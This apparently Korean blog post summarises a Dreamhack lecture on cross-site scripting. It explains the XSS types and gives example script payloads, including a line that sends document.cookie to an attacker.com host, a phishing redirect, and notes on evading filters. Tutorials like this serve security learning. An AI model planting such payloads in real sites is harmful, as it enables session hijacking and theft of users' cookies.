클라이언트 사이드 취약점
웹 페이지의 이용자를 대상으로 공격할 수 있는 취약점으로 이용자 식별을 위한 세션 및 쿠키 정보를 탈취하고 이용자의 계정으로 임의의 기능을 수행할 수 있다.
XSS (Cross Site Scripting)
XSS는 대표적인 클라이언트 사이드 취약점 중 하나로,
공격자가 웹 리소스에 악성 스크립트를 삽입하여 이용자의 웹 브라우저에서 해당 스크립트를 실행할 수 있다.
이를 통해 특정 계정의 세션 정보 탈취 및 임의의 기능을 수행할 수 있음.
예를 들어, 게시판 기능이 있는 특정 사이트에 XSS 취약점이 존재한다면 오리진 권한으로 악성 스크립트가 포함된 게시물을 업로드할 수 있다.
이후에 이용자가 악성 스크립트가 포함된 게시물을 방문하면 스크립트가 실행되어 이용자의 쿠키 및 세션 정보가 탈취될 수 있다.
XSS 취약점은 SOP 정책이 등장하면서 서로 다른 오리진에서 정보를 읽는 행위가 이전에 비해 힘들어졌으나, 이를 우회하는 다양한 기술이 나타나며 XSS 공격은 지속되고 있다.
XSS 발생 예시와 종류
클라이언트는 HTTP 형식으로 웹 서버에 리소스를 요청하고 서버로부터 응답받은 HTML, CSS, JS 등의 웹 리소스를 시각화하여 이용자에게 보여준다.
HTML, CSS, JS 와 같은 코드가 포함되었기 때문에 이용자는 변조된 페이지를 보거나 스크립트가 실행될 수 있다.
XSS는 발생 형태에 따라 다양한 종류로 구분될 수 있다.
| Stored XSS | 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS |
| Reflected XSS | 악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS |
| DOM-based XSS | 악성 스크립트가 URL Fragment에 삽입되는 XSS |
| Universal XSS | 클라이언트의 브라우저 혹은 브라우저의 플러그인에서 발생하는 취약점으로 SOP 정책을 우회하는 XSS |
Stored XSS
서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할 때 발생하는 XSS이다.
대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식이 있다.
게시물과 같이 불특정 다수에게 보여지는 기능은 XSS 취약점이 존재할 경우 높은 파급력을 지님
Reflected XSS
서버가 악성 스크립트가 담긴 요청을 출력할 때 발생하는 XSS이다.
대표적으로 게시판에 작성된 게시물 조회를 위해 검색창에서 스크립트를 포함하여 검색하는 방식이 있다.
검색 결과를 응답에 포함할 때 검색 문자열에 악성 스크립트가 포함되어 있다면 XSS 발생이 가능하다.
Reflected 방식은 Stored 방식과 다르게 URL과 같은 이용자의 요청에 의해 발생한다.
따라서 공격을 위해서는 악성 스크립트가 포함된 링크에 접속을 유도해야 하기 때문에 Click Jacking, Open Redirect 등 다른 취약점과 연계하여 공격을 수행한다.
XSS 스크립트 예시
자바스크립트는 웹 문서의 동작을 정의하며, 버튼 클릭과 같은 이벤트와 데이터 전송과 같은 이벤트를 구현할 수 있다.
자바스크립트는 다양한 동작들을 정의할 수 있기 때문에 XSS 공격에 주로 사용되며, 이를 위한 대표적인 태그가 <script>이다.
쿠키 및 세션 탈취
<script>
// 팝업창 생성
alert("XSS");
// 클라이언트의 페이지 정보에 접근
document;
// 현재 페이지의 쿠키 (string type)
document.cookie;
// 쿠키 생성 (key=value)
document.cookie = "name=test;";
// 새로운 이미지 생성 new Image()
// 이미지의 소스 주소 Image().src = "http://attacker.com/?cookie" + document.cookie;
// 이미지를 불러오기 위해 소스 주소로 요청을 보내기 때문에 공격자에게 쿠키 정보 노출
new Image().src = "http://attacker.com/?cookie" + document.cookie;
</script>
페이지 위치 이동
<script>
// 클라이언트의 위치 변경 (피싱)
location.href = "http://attacker.com/"
// 해당 url에 새창을 열어 접근
window.open("http://attacker.com/")
</script>
<script> 에 대한 필터링이 없는 경우 위와 같이 일반적인 <script> 태그를 통해 XSS 공격이 수행 가능하다.
그러나 <script>에 대한 필터링이 걸려 있는 경우 스크립트를 실행할 수 있는 다른 태그를 찾아서 XSS를 수행하여야 한다.
보통 태그에 포함되는 on 이 붙어있는 함수는 스크립트 실행이 가능하므로 이를 이용하여 다양한 공격을 수행할 수 있다.
아래 XSS 발생 테스트 참고 사이트에서 여러가지 태그 및 필터링 우회 방법을 찾아 볼 수 있다.
XSS 발생 테스트 참고
https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
XSS Filter Evasion - OWASP Cheat Sheet Series
XSS Filter Evasion Cheat Sheet Introduction This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing. The initial contents of this article were donated to OWASP by RSnake, from h
cheatsheetseries.owasp.org
해당 사이트에서는 XSS 발생 테스트를 지원하는 가이드를 제공해준다.
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security Academy
Interactive cross-site scripting (XSS) cheat sheet for 2022, brought to you by PortSwigger. Actively maintained, and regularly updated with new vectors.
portswigger.net
해당 사이트에서는 웹방화벽 및 필터를 우회하는 많은 공격 벡터를 제공해 준다.
이벤트, 태그, 브라우저별로 공격 벡터를 선택할 수 있으며 모든 벡터에 대한 개념 증명도 포함되어 있다.
[출처 : 드림핵 ClientSide XSS https://dreamhack.io/lecture/courses/173]
'SEC > DH' 카테고리의 다른 글
| [WEB] XSS 우회 #2 (0) | 2022.07.16 |
|---|---|
| [WEB] XSS 우회 #1 (0) | 2022.07.16 |
| [REV] IDA 사용법 (0) | 2022.07.13 |
| [WEB] SQL Injection #1 (0) | 2022.07.10 |